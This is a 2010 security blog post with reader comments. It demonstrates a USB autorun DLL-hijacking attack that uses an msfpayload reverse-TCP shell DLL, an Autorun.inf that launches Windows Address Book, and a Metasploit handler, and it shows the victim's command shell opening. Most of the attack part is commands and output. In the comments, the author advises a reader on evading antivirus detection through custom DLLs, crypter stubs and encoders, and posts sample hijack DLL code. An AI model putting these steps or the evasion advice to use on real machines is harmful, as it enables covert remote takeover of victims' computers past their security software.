Autorun DLL Hijacker (USB stick)

Posted: 26th August 2010 by Matt in code, hacks, security
Tags: , , , , , , , , ,
11

I decided that it might be useful to be able to utilize DLL hijacking with Autorun.. here’s the outcome.

# msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: LHOST=192.168.0.58

root@pwn:~# touch /media/KINGSTON/test.vcf
root@pwn:~# ls -l /media/KINGSTON
total 32
-rwxr-xr-x 1 matt matt 91 2010-08-26 14:18 Autorun.inf
-rwxr-xr-x 1 matt matt 0 2010-08-26 14:28 test.vcf
-rwxr-xr-x 1 matt matt 14336 2010-08-26 14:28 wab32res.dll
root@pwn:~# cat /media/KINGSTON/Autorun.inf
[AutoRun]
OPEN=”C:\Program Files\Outlook Express\wab.exe” test.vcf
ACTION=Run
LABEL=test

So, in the Autorun.inf file, we tell it to execute wab.exe (Windows Address Book) and open the file “test.vcf”.

# msfconsole
msf > use multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.58
LHOST => 192.168.0.58
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.58:4444
[*] Starting the payload handler…

Now when the USB card is inserted, the user will get the following dialog:

When the user clicks “OK”…

[*] Sending stage (240 bytes) to 192.168.0.252
[*] Command shell session 1 opened (192.168.0.58:4444 -> 192.168.0.252:1718) at Thu Aug 26 14:43:34 -0500 2010

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

F:\>dir
dir
Volume in drive F is KINGSTON
Volume Serial Number is 733A-3F95

Directory of F:\

08/26/2010 02:18 PM 91 Autorun.inf
08/26/2010 01:53 PM

.Trash-1000
08/26/2010 02:38 PM 14,336 wab32res.dll
08/26/2010 02:28 PM 0 test.v~b
08/26/2010 02:43 PM 176,212 test.vcf
4 File(s) 190,639 bytes
1 Dir(s) 4,002,332,672 bytes free

If you enjoyed this post, make sure you subscribe to my RSS feed! You can also follow me on Twitter here.
Share

Related posts:

  1. Alternative DLL Hijacking Method
  2. New DLL Hijacking Exploits (many!)
  3. File Server LNK Protection
  4. FreeBSD 8.*, 7.* Local ‘root’ Exploit
  5. Windows ‘LNK’ Exploit Demonstration
  1. Infolookup says:
    August 26, 2010 at 3:29 pm

    Good job Matt, you have just given me something else to think about now while trying to keep an eye on our Uni from all the many threats out there.

  2. Matt says:
    August 27, 2010 at 11:27 am

    @Infolookup: Glad I can keep your life exciting. ;-)

  3. nico says:
    August 31, 2010 at 1:41 pm

    hey

    thanks for the article

    i’ve played a bit with those dll and it looks like AVs find them, even a
    msfpayload windows/exec CMD=”c:\windows\system32\calc.exe” |msfencode -t dll -c 10 -o calc.dll gets me a Win32:Malware-gen alert on Avast for example :s any ideas how to overcome this ?

  4. Matt says:
    September 1, 2010 at 9:43 am

    @nico: There are a couple of different ways.

    1) You can write your own DLL, which is what I would suggest. Using metasploit is just a tool to test vulnerabilities, but as far as being useful when it comes to exploiting vulnerabilities like this (when you have to include a payload of some sort), it’s not very effective because it’s picked up by quite a few AV’s..

    2) There is a method for unloading AV’s prior to executing your own code. I haven’t played around with this yet, but I expect I will be shortly

    3) You can use a FUD to encode the DLL, which use something called a “stub” which are available that are specifically written to bypass detection. The problem with stubs, though, is that unless you pay the developer to create a specific stub for you, personally, they don’t stay undetected for very long.

    4) I haven’t used this method yet, but after reading this document, I intend on trying it. http://www.sans.org/reading_room/whitepapers/casestudies/effectiveness-antivirus-detecting-metasploit-payloads_2134

    Here’s a simplified example of rolling your own DLL:

    ?View Code C
    #include <windows.h>
#define DLLIMPORT __declspec (dllexport)
 
DLLIMPORT void hook_startup() { hijack(); }
 
int hijack() {
  WinExec("calc", 0);
  exit(0);
  return 0;
}
  5. nico says:
    September 2, 2010 at 1:43 am

    wow thanks for the detailed answer ! i’ll have a look at this today :)

  6. nico says:
    September 2, 2010 at 4:14 am

    Result: 4/ 43 (9.3%)

    better… and freaky :/

  7. Matt says:
    September 2, 2010 at 9:45 am

    @nico: What method did you use? I actually played around with trying to encode the DLL’s using msfencode and I noticed that..

    1) it definitely helped bypass a lot of the AV’s.. especially the shikata_ga_nai encoder.. but…..
    2) it totally broke the DLL. I think I know why, but I would like to find some more information on the subject

  8. nico says:
    September 2, 2010 at 1:58 pm

    yeah looks like msfencode is breaking it :s
    I just tried the demo of asprotect with a reverse meterpreter

    I’ve had a quick look at the SANS paper which is nice, I’ll try some of his tricks

  9. Matt says:
    September 2, 2010 at 2:09 pm

    @nico: I’d really like to understand WHY it’s breaking it, though.

  10. nico says:
    September 3, 2010 at 7:31 am

    I think it’s a fairly new option in msfencode, maybe not working very well atm.

    I tried this : http://hype-free.blogspot.com/2009/01/loading-meterpreter-in-dll.html (combined with an msfencrypted shellcode) but the resulting dll compiled with gcc does not work either >< and my windows coding skills just suck… I'll go on digging this way i guess

  11. Matt says:
    September 9, 2010 at 12:31 pm

    @nico: Have you looked into Mingw yet? I haven’t used it specifically for this yet, but I’ve used it in the past to compile windows binaries. I want to say that BackTrack comes with it, too.. (I saw a BT video where it was being used). I don’t use BT personally, so I cannot say for certain.

Spam Protection by WP-SpamFree